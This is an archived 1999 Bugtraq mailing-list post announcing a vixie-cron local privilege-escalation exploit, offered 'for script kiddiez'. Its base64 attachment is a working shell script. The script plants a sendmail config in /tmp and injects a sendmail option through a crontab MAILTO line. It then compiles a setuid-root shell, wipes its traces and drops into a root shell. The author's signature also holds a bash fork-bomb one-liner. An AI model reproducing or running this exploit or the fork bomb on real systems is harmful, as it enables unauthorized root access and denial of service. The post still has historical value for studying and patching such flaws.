[11628] in bugtraq
Root shell vixie cron exploit
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Wed Sep 1 06:50:16 1999
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-2050531320-931177012=:1221"
Content-Id: <lcamtuf.4.05.9907051417250.1221@nimue.ids.pl>
Message-Id: <lcamtuf.4.05.9907051224120.392-200000@nimue.ids.pl>
Date: Mon, 5 Jul 1999 14:20:49 +0200
Reply-To: Michal Zalewski <lcamtuf@IDS.PL>
From: Michal Zalewski <lcamtuf@IDS.PL>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--8323328-2050531320-931177012=:1221
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <lcamtuf.4.05.9907051417251.1221@nimue.ids.pl>
For script kiddiez, here's an exploit for recent vixie-cron vulnerability,
giving instant root shell. Thought it will help script kiddies, but as
Martin Schulze included almost step-by-step guide how to abuse Sendmail
flags, this exploit won't bring anything shocking - simply, it's working
example.
** Official statement on my hwclock settings: RTC on my mainboard is
** broken, and I have no cash to replace it with working one :( Just
** execuse me stupid 'Date:' fields in some of my postings...
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
--8323328-2050531320-931177012=:1221
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME=rootcron
Content-Transfer-Encoding: BASE64
Content-ID: <lcamtuf.4.05.9907051416520.1221@nimue.ids.pl>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME=rootcron
IyEvYmluL3NoDQoNCmNsZWFyDQoNCmVjaG8gJy0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLScNCmVjaG8gJ01hcmNoZXcgSHlwZXJyZWFsIEluZHVzdHJpZXMgICAg
ICAgICAgICAgICAgPG1hcmNoZXdAZGlvbmUuaWRzLnBsPicNCmVjaG8gJ1N0
dW1pbG93eSBMYXMgVGVhbSAgICAgICAgICAgICAgICAgICAgICAgPDEwMG1p
bG93eUBnZHluaWEuaWRzLnBsPicNCmVjaG8gJy0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0gcHJlc2VudHMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLScNCmVjaG8gDQplY2hvICcgLT0gdml4aWUtY3JvbiByb290IHNwbG9p
dCBieSBNaWNoYWwgWmFsZXdza2kgPGxjYW10dWZAaWRzLnBsPiA9LScNCmVj
aG8NCg0KZWNobyAnWytdIENoZWNraW5nIGRlcGVuZGVuY2llczonDQoNCmVj
aG8gLW4gJyAgIFsqXSB2aXhpZSBjcm9udGFiOiAnDQoNCmlmIFsgLXUgL3Vz
ci9iaW4vY3JvbnRhYiAtYSAteCAvdXNyL2Jpbi9jcm9udGFiIF07IHRoZW4N
CiAgZWNobyAiT0siDQplbHNlDQogIGVjaG8gIk5PVCBGT1VORCEiDQogIGV4
aXQgMQ0KZmkNCg0KZWNobyAtbiAnICAgWypdIEJlcmtlbGV5IFNlbmRtYWls
OiAnDQoNCmlmIFsgLWYgL3Vzci9zYmluL3NlbmRtYWlsIF07IHRoZW4NCiAg
ZWNobyAiT0siDQplbHNlDQogIGVjaG8gIk5PVCBGT1VORCEiDQogIGV4aXQg
MQ0KZmkNCg0KZWNobyAtbiAnICAgWypdIGdjYyBjb21waWxlcjogJw0KDQpp
ZiBbIC14IC91c3IvYmluL2djYyBdOyB0aGVuDQogIGVjaG8gIk9LIg0KZWxz
ZQ0KICBlY2hvICJOT1QgRk9VTkQhIg0KICBleGl0IDENCmZpDQoNCmVjaG8g
JyAgIFs/XSBEZXBlbmRpZW5jZXMgbm90IHZlcmlmaWVkOicNCmVjaG8gJyAg
ICAgIFsqXSBwcm9wZXIgdmVyc2lvbiBvZiB2aXhpZSBjcm9udGFiJw0KZWNo
byAnICAgICAgWypdIHdyaXRhYmxlIC90bXAgd2l0aG91dCBub2V4ZWMvbm9z
dWlkIG9wdGlvbicNCmVjaG8gJ1srXSBFeHBsb2l0IHN0YXJ0ZWQuJw0KDQpl
Y2hvICJbK10gU2V0dGluZyB1cCAuY2YgZmlsZSBmb3Igc2VuZG1haWwuLi4i
DQoNCmNhdCA+L3RtcC92aXhpZS1jZiA8PF9fZW9mX18NClY3L0JlcmtlbGV5
DQoNCk8gUXVldWVEaXJlY3Rvcnk9L3RtcA0KTyBEZWZhdWx0VXNlcj0wOjAN
Cg0KUiQrCQlcJCNsb2NhbCAkOiBcJDEJCXJlZ3VsYXIgbG9jYWwgbmFtZXMN
Cg0KTWxvY2FsLAkJUD0vdG1wL3ZpeGllLXJvb3QsIEY9bHNERk1BdzU6L3xA
cVNQZmhuOSwgUz0xMC8zMCwgUj0yMC80MCwNCgkJVD1ETlMvUkZDODIyL1gt
VW5peCwNCgkJQT12aXhpZS1yb290DQpfX2VvZl9fDQoNCmVjaG8gJ1srXSBT
ZXR0aW5nIHVwIHBoYXNlICMxIHRvb2wgKHBoYXNlICMyIHRvb2wgY29tcGls
ZXIpLi4uJw0KDQpjYXQgPi90bXAvdml4aWUtcm9vdCA8PF9fZW9mX18NCiMh
L2Jpbi9zaA0KDQpnY2MgL3RtcC92aXhpZS1vd24zZC5jIC1vIC90bXAvdml4
aWUtb3duM2QNCmNobW9kIDY3NTUgL3RtcC92aXhpZS1vd24zZA0KX19lb2Zf
Xw0KDQpjaG1vZCA3NTUgL3RtcC92aXhpZS1yb290DQoNCmVjaG8gJ1srXSBT
ZXR0aW5nIHVwIHBoYXNlICMyIHRvb2wgKHJvb3RzaGVsbCBsYXVuY2hlciku
Li4nDQoNCmNhdCA+L3RtcC92aXhpZS1vd24zZC5jIDw8X19lb2ZfXw0KbWFp
bigpIHsNCiAgc2V0dWlkKDApOw0KICBzZXRnaWQoMCk7DQogIHVubGluaygi
L3RtcC92aXhpZS1vd24zZCIpOw0KICBleGVjbCgiL2Jpbi9zaCIsInNoIiwi
LWkiLDApOw0KfQ0KX19lb2ZfXw0KDQplY2hvICdbK10gUHV0dGluZyBldmls
IGNyb250YWIgZW50cnkuLi4nDQoNCmNyb250YWIgLSA8PF9fZW9mX18NCk1B
SUxUTz0nLUMvdG1wL3ZpeGllLWNmIGR1cGVrJw0KKiAqICogKiAqIG5vbmV4
aXN0DQpfX2VvZl9fDQoNCmVjaG8gJ1srXSBQYXRpZW5jZSBpcyBhIHZpcnR1
ZS4uLiBXYWl0IHVwIHRvIDYwIHNlY29uZHMuJw0KDQpJTEU9MA0KDQplY2hv
IC1uICdbK10gVGljay4nDQoNCndoaWxlIFsgJElMRSAtbHQgNTAgXTsgZG8N
CiAgc2xlZXAgMg0KICBsZXQgSUxFPUlMRSsxDQogIHRlc3QgLWYgL3RtcC92
aXhpZS1vd24zZCAmJiBJTEU9MTAwMA0KICBlY2hvIC1uICcuJw0KZG9uZQ0K
DQplY2hvDQplY2hvICdbK10gSHVoLCBkb25lLiBSZW1vdmluZyBjcm9udGFi
IGVudHJ5Li4uJw0KDQpjcm9udGFiIC1yDQoNCmVjaG8gJ1srXSBSZW1vdmlu
ZyBoZWxwZXIgZmlsZXMuLi4nDQoNCnJtIC1mIC90bXAvdml4aWUtb3duM2Qu
YyAvdG1wL3ZpeGllLXJvb3QgL3RtcC92aXhpZS1jZiAvdG1wL2RmKiAvdG1w
L3FmKiAmPi9kZXYvbnVsbA0KDQplY2hvICdbKl0gQW5kIG5vdy4uLicNCg0K
aWYgWyAtZiAvdG1wL3ZpeGllLW93bjNkIF07IHRoZW4NCiAgZWNobyAnWytd
IEVudGVyaW5nIHJvb3Qgc2hlbGwsIGJhYmUgOiknDQogIGVjaG8NCiAgL3Rt
cC92aXhpZS1vd24zZA0KICBlY2hvDQplbHNlDQogIGVjaG8gJ1stXSBPb3Bz
LCBubyByb290IHNoZWxsIGZvdW5kLCBwYXRjaGVkIHN5c3RlbSBvciBjb25m
aWd1cmF0aW9uIHByb2JsZW0gOignDQpmaQ0KDQplY2hvICdbKl0gRXhwbG9p
dCBkb25lLicNCg==
--8323328-2050531320-931177012=:1221--
